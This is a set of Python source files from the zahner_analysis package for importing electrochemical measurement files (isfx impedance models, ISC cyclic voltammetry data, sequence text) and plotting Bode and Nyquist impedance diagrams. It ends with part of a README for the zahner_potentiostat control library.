return self.xml.attrib["name"]
else:
return IsfxModelElementParameter.elementParameterIndex[self.xmlParentTag][
self.xml.attrib["index"]
]["name"]
def getUnit(self) -> str:
"""Returns the unit of the parameter.
:returns: The unit.
"""
if self.xml.find("unit"):
return self.xml.attrib["unit"]
else:
return IsfxModelElementParameter.elementParameterIndex[self.xmlParentTag][
self.xml.attrib["index"]
]["unit"]
def getValue(self) -> float:
"""Returns the value of the parameter.
:returns: The value.
"""
return float(self.xml.attrib["value"])
def isFixed(self) -> bool:
"""Returns the fixed state of the parameter.
If the parameter is fixed, then it is no longer changed by the fitter.
:returns: True when the value is fixed, else False.
"""
retval = False
fixedState = self.xml.attrib["fitterFixed"]
if fixedState == "0":
retval = True
return retval
def __str__(self) -> str:
"""Returns informations about the parameter as string.
:returns: A string with informations.
"""
return self._parameterToString()
def _parameterToString(self) -> str:
"""Returns informations about the parameter as string.
:returns: A string with informations.
"""
paramDict = self.xml.attrib
try:
reply = f" {self.getName():>6}: {self.getValue():>10.3e} {self.getUnit():<8} fixed: {self.isFixed()}"
except:
reply = " "
for key in paramDict.keys():
reply += f"{key}: {paramDict[key]} "
return reply
class IsfxModelElement:
"""Classe which represents the circuit elements.
This constructor is only used by the class IsfxModelImport.
:param xmlElement: The circuit element.
"""
parameters: list[IsfxModelElementParameter]
xml: et.Element
def __init__(self, xmlElement):
self.xml = xmlElement
xmlParameters = self.xml.findall(".//parameter")
if len(xmlParameters) == 0:
# for the user element it is called user-parameter
xmlParameters = self.xml.findall(".//user-parameter")
self.parameters = [
IsfxModelElementParameter(param, self.xml.tag) for param in xmlParameters
]
return
def __str__(self) -> str:
"""Creates a string with the circuit element and its parameters.
:return: String with the element and its parameters.
"""
retval = f"{self.getType()} : {self.getName()}\n"
for param in self.getParameters():
retval += str(param) + "\n"
return retval
def __getitem__(self, key) -> IsfxModelElementParameter:
"""Returns an parameter of an circuit element.
This function is used to access circuit elements and its parameters via the [] operator.
Then the elements can be accessed as in the following example.
.. code-block:: python
impedanceCircuitModel = IsfxModelImport(r"diode-ac-model.isfx")
print(impedanceCircuitModel["R0"]["R"].getValue())
Each resistor has a parameter R. Young Goehr impedances, for example, have the parameters C, p and T.
:returns: The circuit element parameter.
"""
return self.getParameterByName(key)
def getParameterByName(self, name: str) -> IsfxModelElementParameter:
"""Returns an parameter of an circuit element.
This function is used by the [] operator. Instead of this getter you can also use the []
operator with in the following example.
.. code-block:: python
impedanceCircuitModel = IsfxModelImport(r"diode-ac-model.isfx")
print(impedanceCircuitModel["R0"]["R"].getValue())
Each resistor has a parameter "R". Young Goehr impedances, for example, have the parameters C, p and T.
:returns: The circuit element parameter.
"""
retval = None
parameters = self.getParameters()
for parameter in parameters:
if parameter.getName() == name:
retval = parameter
break
return retval
def getParameters(self) -> list[IsfxModelElementParameter]:
"""Returns all parameters of the circuit element as an array.
:returns: The parameters.
"""
return self.parameters
def getName(self) -> str:
"""Returns the name of the circuit element.
The name is the one assigned in the GUI, for example R0 or CPE7.
:returns: Name of the circuit element.
"""
return self.xml.attrib["name"]
def getType(self) -> str:
"""Returns the type of the circuit element.
:returns: Type of the circuit element.
"""
return self.xml.tag
class IsfxModelImport:
"""Class to import model/circuits.
The models must be in zahner isfx xml format.
Either you pass the filename of the model you want to open or you pass the content of the file as a string.
:param xmlFilePath: The file path of the isfx model file.
:param xmlString: The model as a string or the content of an isfx file.
"""
_filename: str
_xmlString: str
_elements: list[IsfxModelElement]
_completeXmlTree: et.Element
def __init__(self, xmlFilePath: str = None, xmlString: str = None):
self._filename = "FromString.isfx"
if xmlString is not None:
self._xmlString = xmlString
self._completeXmlTree = et.fromstring(xmlString)
elif xmlFilePath is not None:
(_, self._filename) = os.path.split(xmlFilePath)
with open(xmlFilePath, "r", encoding="utf-8") as filename:
self._xmlString = filename.read()
with open(xmlFilePath, "r", encoding="utf-8") as filename:
self._completeXmlTree = et.parse(filename).getroot()
self.parsed_tree_elements = self._completeXmlTree.find("parsed-tree")
pattern = r"<([\S]+)\s*name=\"[\S ]+?\"\s*>"
matched = re.findall(
pattern, str(et.tostring(self.parsed_tree_elements, encoding="utf-8"))
)
self.existingElementTypesInModel = list(set(matched))
self._elements = []
for element in self.existingElementTypesInModel:
foundElements = self._completeXmlTree.findall(".//" + element)
self._elements.extend(
[IsfxModelElement(element) for element in foundElements]
)
return
def __str__(self) -> str:
"""Create string with all circuit elements of the model.
:return: String with all circuit elements.
"""
retval = ""
for element in self._elements:
retval += str(element)
return retval
def toString(self) -> str:
"""Create string with all circuit elements of the model.
print(IsfxModelImport(...)) generates for example the following string:
.. code-block::
Model: li-ion-model - fitted:
inductor : L0
L: 7.940e-07 H fixed: False
finite-diffusion : FI0
W: 4.073e-02 Ωs^(-½) fixed: False
k: 1.385e-03 1/s fixed: False
constant-phase-element : CPE0
C_eq: 6.733e-02 F fixed: False
α: 7.361e-01 fixed: False
f_norm: 1.000e+03 Hz fixed: True
capacitor : C0
C: 5.025e-02 F fixed: False
resistor : R0
R: 3.603e-03 Ω fixed: False
resistor : R1
R: 2.683e-02 Ω fixed: False
resistor : R2
R: 3.597e-02 Ω fixed: False
:return: String with all circuit elements.
"""
return self.__str__()
def __getitem__(self, key: str) -> IsfxModelElement:
"""Access to elements of the model.
This function is used to access circuit elements via the [] operator.
Then the elements can be accessed as in the following example.
.. code-block:: python
impedanceCircuitModel = IsfxModelImport(r"diode-ac-model.isfx")
print(impedanceCircuitModel["R0"]["R"].getValue())
:returns: The circuit element.
"""
return self.getCircuitElementByName(key)
def getCircuitElementByName(self, name: str) -> IsfxModelElement:
"""Returns an element of the circuit.
This function is used by the [] operator. Instead of this getter you can also use the []
operator wi in the following example.
.. code-block:: python
impedanceCircuitModel = IsfxModelImport(r"diode-ac-model.isfx")
print(impedanceCircuitModel["R0"]["R"].getValue())
:returns: The circuit element.
"""
retval = None
for element in self._elements:
if element.getName() == name:
retval = element
break
return retval
def getCircuitElements(self) -> list[IsfxModelElement]:
"""Returns all circuit elements as an array.
:returns: The circuit elements.
"""
return self._elements
def save(self, filename: str):
"""Save the model.
The model is saved with this function. The isfx file format contains xml.
:param filename: Path and filename of the file to be saved with the extension .isfx.
"""
with open(filename, "w", encoding="utf-8") as f:
f.write(self._xmlString)
return
def getFileName(self) -> str:
"""Returns the filename.
If the model was created from the disk, then the filename is returned,
otherwise the name attribute from the xml is returned.
If the xml name attribute is an empty string "FromString.isfx" is returned.
:returns: The name.
"""
return self._filename
def getBinaryFileContent(self) -> bytearray:
"""Get the content of the file binary.
Returns the file contents as a binary byte array.
:returns: bytearray with the file content.
"""
return self._xmlString.encode(encoding="utf-8") | zahner-analysis | /zahner_analysis-1.1.0.tar.gz/zahner_analysis-1.1.0/zahner_analysis/file_import/impedance_model_import.py | impedance_model_import.py |
import numpy as np
import datetime
import io
import re
import os
from zahner_analysis.file_import.thales_file_utils import *
class IscImport:
"""Class to be able to read out isc files (CV).
This class extracts the data from the isc files.
:param file: The path to the isc file, or the isc file as bytes or bytearray.
:type file: str, bytes, bytearray
"""
def __init__(self, filename):
self._filename = "FromBytes.isc"
if isinstance(filename, bytes) or isinstance(filename, bytearray):
self._binaryFileContent = filename
iscFile = io.BytesIO(filename)
else:
(_, self._filename) = os.path.split(filename)
with open(filename, "rb") as f:
self._binaryFileContent = f.read()
iscFile = open(filename, "rb")
self.Pstart = readF8FromFile(iscFile)
self.Tstart = readF8FromFile(iscFile)
self.Pupper = readF8FromFile(iscFile)
self.Plower = readF8FromFile(iscFile)
self.Tend = readF8FromFile(iscFile)
self.Pend = readF8FromFile(iscFile)
self.Srate = readF8FromFile(iscFile)
self.Periods = readF8FromFile(iscFile)
self.PpPer = readF8FromFile(iscFile)
self.Imi = readF8FromFile(iscFile)
self.Ima = readF8FromFile(iscFile)
self.Odrop = readF8FromFile(iscFile)
self.Sstart = readF8FromFile(iscFile)
self.Send = readF8FromFile(iscFile)
self.AZeit = readF8FromFile(iscFile)
self.ZpMp = readF8FromFile(iscFile)
self.delay = readF8FromFile(iscFile)
numberOfElements = readI6FromFile(iscFile) + 1
intVoltageRead = readI2ArrayFromFile(iscFile, numberOfElements)
self.current = readF8ArrayFromFile(iscFile, numberOfElements)
self.Date = readZahnerStringFromFile(iscFile)
self.System = readZahnerStringFromFile(iscFile)
self.Temperature = readZahnerStringFromFile(iscFile)
self.Time = readZahnerStringFromFile(iscFile)
self.Slew_Rate = readZahnerStringFromFile(iscFile)
self.Comment_1 = readZahnerStringFromFile(iscFile)
self.Comment_2 = readZahnerStringFromFile(iscFile)
self.Comment_3 = readZahnerStringFromFile(iscFile)
self.Comment_4 = readZahnerStringFromFile(iscFile)
self.Comment_5 = readZahnerStringFromFile(iscFile)
self.ElecArea = readZahnerStringFromFile(iscFile)
self.POPF = readZahnerStringFromFile(iscFile)
starttime, endtime = self.Time.split("-")
self.measurementStartDateTime = datetime.datetime.strptime(
self.Date + starttime, "%d%m%y%H:%M:%S"
)
self.measurementEndDateTime = datetime.datetime.strptime(
self.Date + endtime, "%d%m%y%H:%M:%S"
)
offset = 0.0
factor = 1.0
popfPattern = "^\s*(.*?),\s*(.*?)\s*PO.PF *(.*?), *(.*)$"
popfMatch = re.search(popfPattern, self.POPF)
if popfMatch:
offset = float(popfMatch.group(1))
factor = float(popfMatch.group(2))
PowerOfPotentialScaling = float(popfMatch.group(3))
ExtraOffsetX = float(popfMatch.group(4))
else:
# fallback to old format for older ISC files:
popfPattern = "^\s*(.*?),\\s*(.*?)\s*PO.PF.*"
popfMatch = re.search(popfPattern, self.POPF)
if popfMatch:
offset = float(popfMatch.group(1))
factor = float(popfMatch.group(2))
self.voltage = intVoltageRead * (factor / 8000.0) + offset
self.time = np.array(range(numberOfElements)) * self.ZpMp + self.Sstart
return
def getMeasurementStartDateTime(self) -> datetime.datetime:
"""Get the start date time of the measurement.
Returns the start datetime of the measurement.
:returns: datetime object with the start time of the measurement.
"""
return self.measurementStartDateTime
def getMeasurementEndDateTime(self) -> datetime.datetime:
"""Get the end date time of the measurement.
Returns the end datetime of the measurement.
:returns: datetime object with the end time of the measurement.
"""
return self.measurementEndDateTime
def getTimeArray(self) -> np.ndarray:
"""Reading the measurement time stamps.
:returns: Numpy array with the time points.
"""
return self.time
def getCurrentArray(self) -> np.ndarray:
"""Reading the measurement current points.
:returns: Numpy array with the current points.
"""
return self.current
def getVoltageArray(self) -> np.ndarray:
"""Reading the measurement voltage points.
:returns: Numpy array with the voltage points.
"""
return self.voltage
def getScanRate(self) -> np.ndarray:
"""Read the scan rate or slew rate.
:returns: The scan rate in V/s.
"""
return self.Srate / 1000.0
def save(self, filename):
"""Save the cv data.
Only the binary file content that has been read is saved. If the data is edited, this is not saved.
:param filename: Path and filename of the file to be saved with the extension .ism.
"""
with open(filename, "wb") as f:
f.write(self._binaryFileContent)
return
def getFileName(self) -> str:
"""Get the name of the file.
:returns: The filename if the file was opened or "FromBytes.isc" if it was created from bytearrays.
"""
return self._filename
def getBinaryFileContent(self) -> bytearray:
"""Get the content of the file binary.
Returns the file contents as a binary byte array.
:returns: bytearray with the file content.
"""
return self._binaryFileContent | zahner-analysis | /zahner_analysis-1.1.0.tar.gz/zahner_analysis-1.1.0/zahner_analysis/file_import/isc_import.py | isc_import.py |
import io
import os
import re
from io import StringIO
from typing import Union
from zahner_analysis.file_import.thales_file_utils import *
class SeqTxtImport:
"""Class to be able to read the sequence text files.
The following lines show a short example how to read all data tracks including ACQ channels.
.. code-block:: python
imp = SeqTxtImport(r"C:/THALES/sequence.txt")
tracks = imp.getTrackTypesList()
dataTracks = {}
for track in tracks:
dataTracks[track] = imp.getTrack(track)
time = imp.getTrack("Time/s")
u = imp.getTrack("E/V")
i = imp.getTrack("I/A")
:param file: The path to the txt file, or the txt file as bytes or bytearray.
:type file: str, bytes, bytearray
"""
def __init__(self, filename: Union[str, bytes, bytearray]):
self._filename = "FromBytes.txt"
if isinstance(filename, bytes) or isinstance(filename, bytearray):
self._binaryFileContent = filename
fileBinary = io.BytesIO(filename)
else:
(_, self._filename) = os.path.split(filename)
with open(filename, "rb") as f:
self._binaryFileContent = f.read()
fileBinary = open(filename, "rb")
fileString = fileBinary.read().decode("utf-8")
fileStringIO = StringIO(fileString)
header = fileStringIO.readline()
singlePattern = r"[\s]+(\S+)"
self._dataTrackNames = re.findall(singlePattern, header)
completePattern = singlePattern * len(self._dataTrackNames) + r"[\s]+"
self._data = dict()
for key in self._dataTrackNames:
self._data[key] = []
for line in fileStringIO.readlines():
match = re.search(completePattern, line)
for i in range(len(self._dataTrackNames)):
self._data[self._dataTrackNames[i]].append(float(match[i + 1]))
return
def getTrackTypesList(self) -> list[str]:
"""
returns a list with the different data tracks.
:returns: List with the track names.
"""
return self._dataTrackNames
def getTrack(self, track: str) -> list[float]:
"""
returns an array with the points for the given track.
:param track: name of the track
:returns: Numpy array with the track.
"""
return self._data[track]
def save(self, filename):
"""Save the cv data.
Only the binary file content that has been read is saved. If the data is edited, this is not saved.
:param filename: Path and filename of the file to be saved with the extension .txt.
"""
with open(filename, "wb") as f:
f.write(self._binaryFileContent)
return
def getFileName(self) -> str:
"""
Get the name of the file.
:returns: The filename if the file was opened or "FromBytes.txt" if it was created from bytearrays.
"""
return self._filename
def getBinaryFileContent(self) -> bytearray:
"""
Get the content of the file binary.
Returns the file contents as a binary byte array.
:returns: bytearray with the file content.
"""
return self._binaryFileContent | zahner-analysis | /zahner_analysis-1.1.0.tar.gz/zahner_analysis-1.1.0/zahner_analysis/file_import/seqtxt_import.py | seqtxt_import.py |
import numpy as np
import io
import struct
import datetime
def readF8FromFile(file: io.BufferedReader) -> float:
bytesRead = file.read(8)
retval = struct.unpack(">d", bytesRead)
return retval[0]
def readF8ArrayFromFile(file: io.BufferedReader, length: int) -> np.ndarray:
return np.ndarray(shape=(length,), dtype=">f8", buffer=file.read(8 * length))
def readI2FromFile(file: io.BufferedReader) -> int:
return int.from_bytes(file.read(2), "big", signed=True)
def peekI2FromFile(file: io.BufferedReader) -> int:
return int.from_bytes(file.peek(2), "big", signed=True)
def readI2ArrayFromFile(file: io.BufferedReader, length: int) -> np.ndarray:
return np.ndarray(shape=(length,), dtype=">i2", buffer=file.read(2 * length))
def readI6FromFile(file: io.BufferedReader) -> int:
return int.from_bytes(file.read(6), "big", signed=True)
def readTimeStampDateTimeArrayFromFile(
file: io.BufferedReader, length: int
) -> list[datetime.datetime]:
timeArray = readF8ArrayFromFile(file, length)
datetimeArray = []
for time in timeArray:
datetimeArray.append(thalesTimeStampToDateTime(time))
return datetimeArray
def readZahnerStringFromFile(file: io.BufferedReader) -> str:
length = readI2FromFile(file)
content = bytearray()
for i in range(length):
content.append(file.read(1)[0])
return content.decode("ASCII").swapcase()
def readZahnerDate(file: io.BufferedReader) -> datetime.datetime:
dateString = readZahnerStringFromFile(file)
date = dateString[0:6]
day = int(date[0:2])
month = int(date[2:4])
year = int(date[4:6])
"""
Only the last two digits of the date are saved.
It is assumed that the measurement was carried out between 1970 and 2070.
A software update is necessary in the year 2070 at the latest.
"""
if year < 70:
year += 2000
else:
year += 1900
return datetime.datetime(year, month, day)
def thalesTimeStampToDateTime(timestamp: int) -> datetime.datetime:
"""Calculation of the time stamp.
The time is in seconds related to 01.01.1980.
:param timestamp: Seconds since 01.01.1980.
:returns: Python datetime object.
"""
timeZero = datetime.datetime(1980, 1, 1)
timeDifference = datetime.timedelta(seconds=abs(timestamp))
timestamp = timeZero + timeDifference
return timestamp | zahner-analysis | /zahner_analysis-1.1.0.tar.gz/zahner_analysis-1.1.0/zahner_analysis/file_import/thales_file_utils.py | thales_file_utils.py |
import matplotlib.pyplot as plt
from matplotlib.ticker import EngFormatter
import numpy as np
from zahner_analysis.file_import.ism_import import IsmImport
def bodePlotter(
axes=None,
frequencies=None,
Z=None,
impedanceAbsolute=None,
phase=None,
impedanceObject=None,
zTogetherPhase=True,
absPhase=True,
argsImpedanceAxis={},
argsPhaseAxis={},
):
"""Plot of an impedance spectrum in Bode representation
If no axes are passed, a new figure is created. Here you can decide whether impedance and phase are to be displayed in the same plot.
The figure object and the axis objects are always returned.
Either the complex impedance can be transferred with the parameter Z or impedance and phase can be transferred separately.
The phase must be passed in radians, not in degrees. By default, the amount of the phase is displayed - this can be switched off.
With argsImpedanceAxis and argsPhaseAxis the appearance of the lines and the plot can be influenced.
These values are dictionaries which are parameterised like the matplotlib plotting functions.
The possible configurations can be found in the Matplotlib `Line2D properties documentation <https://matplotlib.org/3.5.0/api/_as_gen/matplotlib.lines.Line2D.html#matplotlib.lines.Line2D>`_.
The following code section shows the dictionaries with the default axis configuration, which can be overwritten and extended.
.. code-block:: python
defaultImpedanceFormat = {"linestyle":'dashed',
"linewidth":1,
"marker":"o",
"markersize":5,
"fillstyle":"none",
"color":"blue"}
defaultPhaseFormat = {"linestyle":'dashed',
"linewidth":1,
"marker":"o",
"markersize":5,
"fillstyle":"none",
"color":"red"}
The application could look like the following example, in which two spectra are plotted in bode representation and a legend is added.
.. code-block:: python
(fig, axes) = bodePlotter(None, frequencies, Z=firstImpedances)
(fig, axes) = bodePlotter(axes, frequencies, Z=secondImpedances,
argsImpedanceAxis={"color": "green"}, argsPhaseAxis={"marker": "x"})
(impedanceAxis, phaseAxis) = axes
impedanceAxis.legend(["first spectra", "second spectra"])
plt.show()
(fig, (impedanceAxis, phaseAxis)) = bodePlotter(impedanceObject=IsmImport(r"path/to/file"))
plt.show()
:param axes: Tuple of impedance and phase axis (impedanceAxis, phaseAxis). If None is passed, a new figure with corresponding axes is created.
:param frequencies: Array with the frequency points.
:param Z: Array with the complex impedances. Either the parameter Z must be passed or impedanceAbsolute and phase must be passed.
:param impedanceAbsolute: Array with the impedance absolute values. Either the parameter Z must be passed or impedanceAbsolute and phase must be passed.
:param phase: Array with the phase values in radians. Either the parameter Z must be passed or impedanceAbsolute and phase must be passed.
:param zTogetherPhase: If this parameter is True, impedance and phase are displayed in a plot. If False, impedance and phase are shown in separate subplots.
This parameter only has meaning if the parameter axes is None.
:param absPhase: If True, the absolute value of the phase is displayed.
:param argsImpedanceAxis: Standard Matplotlib `Line2D properties <https://matplotlib.org/3.5.0/api/_as_gen/matplotlib.lines.Line2D.html#matplotlib.lines.Line2D>`_ as dictionary,
which are passed into the plotting functions, for example to adjust colours and line widths.
:param argsPhaseAxis: Standard Matplotlib `Line2D properties <https://matplotlib.org/3.5.0/api/_as_gen/matplotlib.lines.Line2D.html#matplotlib.lines.Line2D>`_ as dictionary,
which are passed into the plotting functions, for example to adjust colours and line widths.
:return: A tuple with a figure and a tuple of axis objects is returned. figure, (impedanceAxis, phaseAxis)
"""
if axes is None:
if zTogetherPhase:
fig, (impedanceAxis) = plt.subplots(1, 1)
phaseAxis = impedanceAxis.twinx()
else:
fig, (impedanceAxis, phaseAxis) = plt.subplots(2, 1, sharex=True)
else:
(impedanceAxis, phaseAxis) = axes
fig = impedanceAxis.get_figure()
frequencies, Z, impedanceAbsolute, phase = _impedanceParameterAssociation(
frequencies=frequencies,
Z=Z,
impedanceAbsolute=impedanceAbsolute,
phase=phase,
impedanceObject=impedanceObject,
)
defaultImpedanceFormat = {
"linestyle": "dashed",
"linewidth": 1,
"marker": "o",
"markersize": 5,
"fillstyle": "none",
"color": "blue",
}
for key in defaultImpedanceFormat.keys():
if key not in argsImpedanceAxis:
argsImpedanceAxis[key] = defaultImpedanceFormat[key]
impedanceAxis.loglog(frequencies, np.abs(impedanceAbsolute), **argsImpedanceAxis)
impedanceAxis.xaxis.set_major_formatter(EngFormatter(unit="Hz"))
impedanceAxis.yaxis.set_major_formatter(EngFormatter(unit="$\Omega$"))
impedanceAxis.set_xlabel(r"f")
impedanceAxis.set_ylabel(r"|Z|")
if zTogetherPhase:
impedanceAxis.yaxis.label.set_color(argsImpedanceAxis["color"])
impedanceAxis.grid(which="both", linestyle="dashed", linewidth=0.5)
impedanceAxis.set_xlim([min(frequencies) * 0.8, max(frequencies) * 1.2])
if absPhase:
phaseToPlot = np.abs(phase * (360 / (2 * np.pi)))
phaseLabel = r"|Phase|"
else:
phaseToPlot = phase * (360 / (2 * np.pi))
phaseLabel = r"Phase"
defaultPhaseFormat = {
"linestyle": "dashed",
"linewidth": 1,
"marker": "o",
"markersize": 5,
"fillstyle": "none",
"color": "red",
}
for key in defaultPhaseFormat.keys():
if key not in argsPhaseAxis:
argsPhaseAxis[key] = defaultPhaseFormat[key]
phaseAxis.semilogx(frequencies, phaseToPlot, **argsPhaseAxis)
phaseAxis.yaxis.set_major_formatter(EngFormatter(unit="$°$", sep=""))
phaseAxis.xaxis.set_major_formatter(EngFormatter(unit="Hz"))
phaseAxis.set_xlabel(r"f")
phaseAxis.set_ylabel(phaseLabel)
if _checkForTwinAx(phaseAxis) is False:
phaseAxis.grid(which="both", linestyle="dashed", linewidth=0.5)
else:
phaseAxis.yaxis.label.set_color(argsPhaseAxis["color"])
if absPhase is True:
phaseAxis.set_ylim([0, 90])
return fig, (impedanceAxis, phaseAxis)
def nyquistPlotter(
ax=None,
Z=None,
impedanceAbsolute=None,
phase=None,
impedanceObject=None,
frequenciesToAnnotate=None,
minusNyquist=True,
maximumAbsImpedance=None,
argsNyquistAxis={},
):
"""Plot of an impedance spectrum in Nyquist representation
If no axis is passed, a new figure is created, otherwise, it is plotted on this axis.
The figure object and the axis objects are always returned.
Either the complex impedance can be transferred with the parameter Z or impedance and phase can be transferred separately.
The phase must be passed in radians, not in degrees.
minusNyquist is True by default and the graph with conjugate complex data is displayed as a -Nyquist plot.
It is also possible to write text in the diagram, for example to label selected points in the Nyquist diagram with the frequency.
The following is an excerpt from an application example.
.. code-block:: python
annotations = []
for i in [0, 5, 15, 40, 44]:
annotations.append([frequencies[i], Z[i], {"fontsize":8}])
(fig, ax) = nyquistPlotter(None, frequenciesToAnnotate=annotations, Z=Z, maximumAbsImpedance=0.005)
plt.show()
(fig, ax) = nyquistPlotter(None, frequenciesToAnnotate=annotations, Z=Z,
minusNyquist=False, maximumAbsImpedance=0.005)
(fig, ax) = nyquistPlotter(ax, Z=Z2,
argsNyquistAxis={"color": "blue", "marker": "x"},
minusNyquist=False, maximumAbsImpedance=0.005)
ax.legend(["first impedance Z1", "second impedance Z2"])
plt.show()
(fig, axes) = nyquistPlotter(impedanceObject=IsmImport(r"path/to/file"))
plt.show()
:param axes: Axis on which to plot or None.. If None is passed, a new figure with corresponding axes is created.
:param Z: Array with the complex impedances. Either the parameter Z must be passed or impedanceAbsolute and phase must be passed.
:param impedanceAbsolute: Array with the impedance absolute values. Either the parameter Z must be passed or impedanceAbsolute and phase must be passed.
:param phase: Array with the phase values in radians. Either the parameter Z must be passed or impedanceAbsolute and phase must be passed.
:param frequenciesToAnnotate: Points with labels in the diagram for frequencies, for example. [[text,Z,formattingDict],[],...]
For formatting the points with the formattingDict can be found in the `Matplotlib annotate documentation <https://matplotlib.org/3.5.0/api/_as_gen/matplotlib.pyplot.annotate.html#matplotlib.pyplot.annotate>`_ .
This parameter can also be omitted and an array can be passed with text and complex impedance only.
:param minusNyquist: If this value is True, the imaginary part is displayed inverted -Nyquist plot. This is the default.
:param maximumAbsImpedance: Maximum absolute impedance up to which the data points are plotted.
:param argsNyquistAxis: Standard Matplotlib `Line2D properties <https://matplotlib.org/3.5.0/api/_as_gen/matplotlib.lines.Line2D.html#matplotlib.lines.Line2D>`_ as dictionary,
which are passed into the plotting functions, for example to adjust colours and line widths.
:return: A tuple with a figure and a tuple of axis objects is returned. figure, nyquistAxis
"""
if ax is None:
fig, (nyquistAxis) = plt.subplots(1, 1)
else:
nyquistAxis = ax
fig = nyquistAxis.get_figure()
_, Z, impedanceAbsolute, phase = _impedanceParameterAssociation(
frequencies=None,
Z=Z,
impedanceAbsolute=impedanceAbsolute,
phase=phase,
impedanceObject=impedanceObject,
frequenciesRequired=False,
)
defaultImpedanceFormat = {
"linestyle": "dashed",
"linewidth": 1,
"marker": "o",
"markersize": 5,
"fillstyle": "none",
"color": "#2e8b57",
}
for key in defaultImpedanceFormat.keys():
if key not in argsNyquistAxis:
argsNyquistAxis[key] = defaultImpedanceFormat[key]
if minusNyquist:
Z = np.conj(Z)
if maximumAbsImpedance is not None:
Z = [x for x in Z if np.abs(x) < maximumAbsImpedance]
nyquistAxis.plot(np.real(Z), np.imag(Z), **argsNyquistAxis)
nyquistAxis.grid(which="both", linestyle="dashed", linewidth=0.5)
nyquistAxis.set_aspect("equal")
nyquistAxis.xaxis.set_major_formatter(EngFormatter(unit="$\Omega$"))
nyquistAxis.yaxis.set_major_formatter(EngFormatter(unit="$\Omega$"))
nyquistAxis.set_xlabel(r"$Z_{\rm re}$")
if minusNyquist:
nyquistAxis.set_ylabel(r"$-Z_{\rm im}$")
else:
nyquistAxis.set_ylabel(r"$Z_{\rm im}$")
formatter = EngFormatter(places=2, unit="Hz")
if frequenciesToAnnotate is not None:
for anon in frequenciesToAnnotate:
if len(anon) == 3:
additionalArgs = anon[2]
else:
additionalArgs = {}
if minusNyquist:
factor = -1.0
else:
factor = 1.0
nyquistAxis.annotate(
formatter.format_data(anon[0]),
(np.real(anon[1]), factor * np.imag(anon[1])),
**additionalArgs
)
return fig, nyquistAxis
def _impedanceParameterAssociation(
frequencies=None,
Z=None,
impedanceAbsolute=None,
phase=None,
impedanceObject=None,
frequenciesRequired=True,
):
if impedanceObject is not None:
# Impedance file is preferred.
frequencies = impedanceObject.getFrequencyArray()
Z = impedanceObject.getComplexImpedanceArray()
impedanceAbsolute = impedanceObject.getImpedanceArray()
phase = impedanceObject.getPhaseArray()
elif Z is not None:
# Second possibility Z and frequency is available.
impedanceAbsolute = np.abs(Z)
phase = np.angle(Z)
elif impedanceAbsolute is not None and phase is not None:
Z = np.cos(phase) * impedanceAbsolute + 1j * np.sin(phase) * impedanceAbsolute
else:
raise ValueError(
"impedanceObject or Z or (impedanceAbsolute and phase) required"
)
if frequenciesRequired is True and frequencies is None:
raise ValueError("frequency parameter is required")
return frequencies, Z, impedanceAbsolute, phase
def _checkForTwinAx(axis):
retval = False
for ax in axis.figure.axes:
if ax is axis:
continue
if ax.bbox.bounds == axis.bbox.bounds:
retval = True
return retval | zahner-analysis | /zahner_analysis-1.1.0.tar.gz/zahner_analysis-1.1.0/zahner_analysis/plotting/impedance_plot.py | impedance_plot.py |
# zahner_potentiostat
zahner_potentiostat is a library to control external [Zahner Potentiostats](https://zahner.de/products#external-potentiostats) like **PP212, PP222, PP242, XPOT2 or EL1002**.
It was developed to **easily integrate** external Zahner Potentiostats into Python scripts for more **complex measurement** tasks and for **automation purposes**.
The control concept is that there are different primitives which can be combined for different electrochemical measurement methods.
These primitives can all be configured differently to match the application. In the documentation in the respective function all possible configuration setter methods are listed. The complete documentation of the functions can be found on the [API documentation website](https://doc.zahner.de/zahner_potentiostat/).
**The following [primitives](https://en.wikipedia.org/wiki/Language_primitive) are available to compose methods with:**
* Potentiostatic or galvanostatic polarization
* [measurePolarization()](https://doc.zahner.de/zahner_potentiostat/scpi_control/control.html#zahner_potentiostat.scpi_control.control.SCPIDevice.measurePolarization)
* Open circuit voltage/potential scan
* [measureOCV()](https://doc.zahner.de/zahner_potentiostat/scpi_control/control.html#zahner_potentiostat.scpi_control.control.SCPIDevice.measureOCV)
* [measureOCVScan()](https://doc.zahner.de/zahner_potentiostat/scpi_control/control.html#zahner_potentiostat.scpi_control.control.SCPIDevice.measureOCVScan)
* Ramps potentiostatic or galvanostatic
* [measureRampValueInTime()](https://doc.zahner.de/zahner_potentiostat/scpi_control/control.html#zahner_potentiostat.scpi_control.control.SCPIDevice.measureRampValueInTime)
* [measureRampValueInScanRate()](https://doc.zahner.de/zahner_potentiostat/scpi_control/control.html#zahner_potentiostat.scpi_control.control.SCPIDevice.measureRampValueInScanRate)
* [measureRampScanRateForTime()](https://doc.zahner.de/zahner_potentiostat/scpi_control/control.html#zahner_potentiostat.scpi_control.control.SCPIDevice.measureRampScanRateForTime)
* Staircase potentiostatic or galvanostatic
* [measureIEStairs()](https://doc.zahner.de/zahner_potentiostat/scpi_control/control.html#zahner_potentiostat.scpi_control.control.SCPIDevice.measureIEStairs)
**And as an example, the following methods were developed from the primitives:**
* Charge or discharge something
* [measureCharge()](https://doc.zahner.de/zahner_potentiostat/scpi_control/control.html#zahner_potentiostat.scpi_control.control.SCPIDevice.measureCharge)
* [measureDischarge()](https://doc.zahner.de/zahner_potentiostat/scpi_control/control.html#zahner_potentiostat.scpi_control.control.SCPIDevice.measureDischarge)
* Output potentiostatic or galvanostatic profile as potentiostatic or galvanostatic polarizations or ramps
* [measureProfile()](https://doc.zahner.de/zahner_potentiostat/scpi_control/control.html#zahner_potentiostat.scpi_control.control.SCPIDevice.measureProfile)
* PITT Potentiostatic Intermittent Titration Technique
* [measurePITT()](https://doc.zahner.de/zahner_potentiostat/scpi_control/control.html#zahner_potentiostat.scpi_control.control.SCPIDevice.measurePITT)
* GITT Galvanostatic Intermittent Titration Technique
* [measureGITT()](https://doc.zahner.de/zahner_potentiostat/scpi_control/control.html#zahner_potentiostat.scpi_control.control.SCPIDevice.measureGITT)
Further measurements like EIS and CV can be done in connection with a Zennium with the package [thales_remote](https://github.com/Zahner-elektrik/Thales-Remote-Python).
# 🔧 Installation
The package can be installed via pip.
```
pip install zahner_potentiostat
```
# 🔨 Basic Usage
```python
'''
Search the Zahner Potentiostat
'''
deviceSearcher = SCPIDeviceSearcher()
deviceSearcher.searchZahnerDevices()
commandSerial, dataSerial = deviceSearcher.selectDevice("35000")
'''
Connect to the Potentiostat
'''
ZahnerPP2x2 = SCPIDevice(SerialCommandInterface(commandSerial), SerialDataInterface(dataSerial))
'''
Setup measurement
'''
ZahnerPP2x2.setSamplingFrequency(25)
